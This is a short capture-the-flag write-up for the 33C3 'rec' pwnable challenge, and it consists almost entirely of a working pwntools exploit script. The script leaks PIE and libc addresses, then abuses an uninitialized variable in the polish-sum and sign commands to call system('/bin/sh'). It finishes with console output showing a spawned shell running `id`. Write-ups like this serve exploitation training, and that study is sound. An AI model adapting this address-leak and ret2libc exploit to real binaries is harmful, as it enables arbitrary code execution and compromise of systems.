33C3 CTF - rec

Category : pwnable

Summary : uninitialized variable

Exploit

#!/usr/bin/python

from pwn import *


def cmd_polish_sum(nums):
   ru('> ')
   sl(str(2))
   ru('Operator: ')
   sl('S')
   for i in range(len(nums)):
      ru('Operand: ')
      sl(str(nums[i]))
   ru('Operand: ')
   sl('.')
   rl()
      
def cmd_sign(num):
   ru('> ')
   sl(str(5))
   sl(str(num))
   
def cmd_read_note():
   ru('> ')
   sl(str(1))
   ru('Your note: ')
   note = rl(False)
   return note


s = process('./rec')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

leak = cmd_read_note()
pie_base = u32(leak[4:8]) - 0x6fb
sh_string = pie_base + 0x10cc
libc_base = u32(leak[8:12]) - 0x1b0d60
libc_system = libc_base + 0x3a940
print hex(libc_base)

pay = [0 for i in range((0x380 - 0x24 - 8 - 0x44 + 8) / 8)]
pay.append(libc_system - 0x100000000)
pay.append(sh_string)
cmd_polish_sum(pay)
cmd_sign(0)

s.interactive()
s.close()

$ python ex.py 
[+] Starting local process './rec': pid 129954
0xf7d4b000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)